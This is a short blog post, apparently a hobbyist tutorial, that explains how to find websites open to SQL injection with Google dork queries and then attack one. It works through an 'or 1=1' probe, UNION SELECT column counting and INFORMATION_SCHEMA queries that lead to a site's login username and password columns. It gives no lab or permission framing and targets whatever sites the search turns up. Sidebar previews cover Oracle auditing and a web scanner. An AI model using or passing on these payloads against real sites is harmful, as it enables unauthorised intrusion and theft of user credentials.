Skip to main content

SQL Injection Test 1

Search Google about Dork List 2013 SQL Injection
Here are some from the list is :  

     http://tutsql.blogspot.com/2013/06/dork-list.html  
    http://securitypedia.blogspot.com/p/dork-list-2013_7588.html
 
 
-- choose one way of them to google it like : inurl:newsdetail.php?id=

-- choose one of the sites in the below and then do the following checks 

http://www.somesite.com/newsdetail.php?id=-1' or '1'='1
-- success else , if fail and this error appears , that means this site is injectable , you can use another way to compromise it .


Warning : Don't forget to get the database version .
http://www.somesite.com/newsdetail.php?id=-1+union+select+1,2,3,4,5
-- try and test --> 5 arguments success  
-- the 2,4 appears on the picture means that the DB reply to your injection . (It works) 
Now , You can do the rest .. 
http://www.somesite.com/newsdetail.php?id=-1+union+select+1,table_name,1,table_name,table_name%20from%20INFORMATION_SCHEMA.tables%20%20limit%2043,1
-- success -- table name : login
http://www.somesite.com/newsdetail.php?id=-1+union+select+1,table_name,1,column_name,column_name%20from%20INFORMATION_SCHEMA.columns%20limit%20492,1
-- login.username
http://www.somesite.com/newsdetail.php?id=-1+union+select+1,table_name,1,column_name,column_name%20from%20INFORMATION_SCHEMA.columns%20limit%20493,1
-- login.password
Labels:

Comments

Post a Comment

Popular posts from this blog

The Difference between DB and DB_EXTENDED

When doing Audit on any table on the the database , the default auditing is DB. SQL > show parameters audit_trail NAME                                 TYPE        VALUE ------------------------------------ ----------- ------------------------------ audit_trail                          string      DB in this case , when you do audit on some table. SQL> audit all on scott.emp by access; Audit succeeded SQL> update emp set sal=sal*0.95 where job='MANAGER'; 3 rows updated. if you want to know the statement made these changes, you will receive nothing on the sql_text field while you are selecting the audit_trial table.
Post a Comment
Read more

Web Application Security Scanner : Sandcat

Sandcat is multi-process remote web application security scanner. It maps the entire web site structure ( all links , forms , XHR requests and other entry points) and tries to find custom,unique vulnerabilities by simulating a wide range of attacks/sending thousands of requests (mostly GET and POST).  It also tests for SQL Inection, XSS, File inclusion and many other web application vulnerability classes.  Sandcat's code scanning functionality automates the process of reviewing the web application's code .  Source : CEH Lectures ...
Post a Comment
Read more